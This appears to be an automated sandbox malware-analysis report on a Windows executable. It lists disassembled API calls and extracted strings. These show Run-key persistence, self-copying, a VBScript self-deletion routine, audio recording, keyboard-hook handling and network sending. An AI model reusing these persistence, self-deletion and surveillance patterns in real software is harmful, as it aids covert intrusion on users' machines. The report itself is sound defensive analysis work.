                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                  • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                  • API String ID: 4250697656-2665858469
                                                  • Opcode ID: 3d42b44d750123df58dd0095c81a5fc6e084040cf4175f0c7ad54764f3607af6
                                                  • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                  • Opcode Fuzzy Hash: 3d42b44d750123df58dd0095c81a5fc6e084040cf4175f0c7ad54764f3607af6
                                                  • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                    • Part of subcall function 0041B58F: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                  • ExitProcess.KERNEL32 ref: 0040C63E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-3168347843
                                                  • Opcode ID: 0084137e0cf4c87855722601cfbf1a3198e8c736f4845412eba00602d73caec5
                                                  • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                  • Opcode Fuzzy Hash: 0084137e0cf4c87855722601cfbf1a3198e8c736f4845412eba00602d73caec5
                                                  • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                  • SetEvent.KERNEL32 ref: 0041A38A
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                  • CloseHandle.KERNEL32 ref: 0041A3AB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $TUF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                  • API String ID: 738084811-2745919808
                                                  • Opcode ID: bd2b78bdf7882fcf1bd9c66ee0dd5e0eeece89037218133603e6342822e6d96b
                                                  • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                  • Opcode Fuzzy Hash: bd2b78bdf7882fcf1bd9c66ee0dd5e0eeece89037218133603e6342822e6d96b
                                                  • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,774D3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                  • ExitProcess.KERNEL32 ref: 0040C287
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                  • API String ID: 3797177996-1998216422
                                                  • Opcode ID: 8eaf99752597ea1a4d10927b3751fb5e27277ddc3ade82d131f2180467ece9db
                                                  • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                  • Opcode Fuzzy Hash: 8eaf99752597ea1a4d10927b3751fb5e27277ddc3ade82d131f2180467ece9db
                                                  • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                  • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                  • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                  • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                  • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                  • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                  • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\NssBkEQKsI.exe,00000001,004068B2,C:\Users\user\Desktop\NssBkEQKsI.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Users\user\Desktop\NssBkEQKsI.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-2972251932
                                                  • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                  • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                  • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                  • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040BC75
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\NssBkEQKsI.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                  • _wcslen.LIBCMT ref: 0040BD54
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\NssBkEQKsI.exe,00000000,00000000), ref: 0040BDF2
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                  • _wcslen.LIBCMT ref: 0040BE34
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                  • ExitProcess.KERNEL32 ref: 0040BED0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Users\user\Desktop\NssBkEQKsI.exe$del$open$BG$BG
                                                  • API String ID: 1579085052-404225302
                                                  • Opcode ID: 3074b94dd0db5ede3fe92545a612de18a9a35f6e419f75cb91ba7ed246302fb8
                                                  • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                  • Opcode Fuzzy Hash: 3074b94dd0db5ede3fe92545a612de18a9a35f6e419f75cb91ba7ed246302fb8
                                                  • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                  • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                  • lstrlenW.KERNEL32(?), ref: 0041B207
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                  • _wcslen.LIBCMT ref: 0041B2DB
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                  • GetLastError.KERNEL32 ref: 0041B313
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                  • GetLastError.KERNEL32 ref: 0041B370
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                  • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID:
                                                  • API String ID: 3899193279-0
                                                  • Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                  • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                  • Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                  • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,774D3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                  • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                  • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                  • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                  • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                  • Sleep.KERNEL32(00000064), ref: 00412060
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$HDG$HDG$>G$>G
                                                  • API String ID: 1223786279-3931108886
                                                  • Opcode ID: de09ca1273d0c0ae3b083ae06ed04fb5dc0d26aaaf0155bdb591019118a51702
                                                  • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                  • Opcode Fuzzy Hash: de09ca1273d0c0ae3b083ae06ed04fb5dc0d26aaaf0155bdb591019118a51702
                                                  • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                  • GetCursorPos.USER32(?), ref: 0041CAF8
                                                  • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                  • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                  • ExitProcess.KERNEL32 ref: 0041CB74
                                                  • CreatePopupMenu.USER32 ref: 0041CB7A
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1657328048-3535843008
                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                  • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                  • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                  • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                  • __aulldiv.LIBCMT ref: 00407FE9
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                  Strings
                                                  Memory Dump Source
